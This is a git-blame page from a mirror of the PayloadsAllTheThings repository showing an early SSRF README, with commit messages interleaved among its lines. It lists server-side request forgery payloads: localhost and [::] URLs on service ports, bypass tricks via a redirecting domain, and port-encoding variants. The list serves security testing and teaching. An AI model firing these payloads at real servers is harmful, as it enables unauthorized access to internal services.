Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 15:14:34 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/SSRF injection/README.md

38 lines
609 B
Markdown
Raw Normal View History

SSRF payloads
2016-10-18 07:54:41 +00:00
# Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
Init directory with README
2016-10-18 08:01:56 +00:00
SSRF payloads
2016-10-18 07:54:41 +00:00
## Exploit
Init directory with README
2016-10-18 08:01:56 +00:00
SSRF payloads
2016-10-18 07:54:41 +00:00
Basic SSRF v1
Init directory with README
2016-10-18 08:01:56 +00:00
```
SSRF payloads
2016-10-18 07:54:41 +00:00
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
```
Basic SSRF v2
```
http://localhost:80
http://localhost:443
http://localhost:22
```
Bypass localhost with [::]
```
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
```
Bypass localhost with a domain redirecting to locahost
```
http://n-pn.info
Init directory with README
2016-10-18 08:01:56 +00:00
```
Minor Updates in SQL-SSRF-XSS
2017-01-07 19:51:47 +00:00
-> 11211
localhost:+11211aaa
localhost:00011211aaaa
Init directory with README
2016-10-18 08:01:56 +00:00
## Thanks to
SSRF payloads
2016-10-18 07:54:41 +00:00
*
Reference in a new issue Copy permalink